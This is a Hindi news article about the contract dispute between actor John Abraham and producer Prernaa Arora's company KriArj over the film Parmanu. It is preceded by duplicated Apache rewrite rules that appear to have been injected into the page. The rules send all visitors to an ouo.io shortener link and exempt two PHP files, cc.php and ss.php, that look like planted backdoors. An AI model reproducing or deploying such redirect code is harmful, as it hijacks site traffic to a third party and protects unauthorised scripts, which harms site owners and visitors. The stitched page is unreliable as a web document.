
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 325
Previous Nextनई दिल्ली। परमाणु फिल्म को लेकर एक्टर जॉन अब्राहम और प्रोड्क्शन हाउस के बीच विवाद जारी है। खबरें आ रहीं थी कि एक्टर के खिलाफ प्रेरणा अरोरा के प्रोडक्शन हाउस क्रिअर्स ने मुंबई के खार पुलिस स्टेशन में एफआईआर दर्ज कराई है। लेकिन इस मामले पर जब पड़ताल की तो मुंबई पुलिस ने जॉन अब्राहम के खिलाफ किसी भी एफआईआर के दर्ज होने की बात को खारिज किया है। आपको बता दें मीडिया रिपोर्ट्स में ये खबरें आई थीं कि एक्टर पर परमाणु फिल्म को लेकर धोखाधड़ी समेत कई आरोप लगाए हैं। इस मामले में एक्टर से पुलिस जल्द पूछताछ की जा सकती है। जॉन अब्राहम की मोस्ट अवेटेड फिल्म परमाणु विवादों में उलझ गई है, जिसके चलते एक बार फिर फिल्म की रिलीज डेट टाल दी गई। जॉन अब्राहम ने फिल्म की को-प्रोड्यूसर प्रेरणा अरोरा के प्रोडक्शन हाउस क्रिअर्स से अपना एग्रीमेंट रद्द कर दिया है। साथ ही क्रिअर्ज को एक लंबा चौडा़ नोटिस भेजा है। लंबे समय से जॉन अब्राहम और प्रेरणा अरोरा के बीच विवाद चल रहा था। अब फिल्म की रिलीज डेट फिर आगे बढ़ गई है. ये 4 मई, 2018 को रिलीज होगी।
बकौल प्रेरणा, 'हम जल्द कोर्ट जाएंगे। यदि वे सही हैं तो जीत उनकी होगी। जॉन को अपना पैसा मिल गया है और वो अब समय बर्बाद कर रहे हैं। हम जॉन से बात करना चाहते हैं, लेकिन वे संपर्क में नहीं आ रहे। उन्होंने प्रोफिट का 50 परसेंट लेकर क्रिअर्ज को लूटा है। हम लड़ेंगे और अपनी फिल्म वापस लेंगे।' पिछले साल की शुरुआत में भारत सरकार द्वारा राजस्थान के पोरखण में किए गए परमाणु परीक्षण पर जॉन अब्राहम ने फिल्म बनाने की घोषणा की थी। जॉन इसमें लीड रोल में हैं। इस फिल्म को जॉन ने प्रेरणा अरोरा के क्रिअर्ज प्रोडक्शन के साथ बनाने का तय किया था।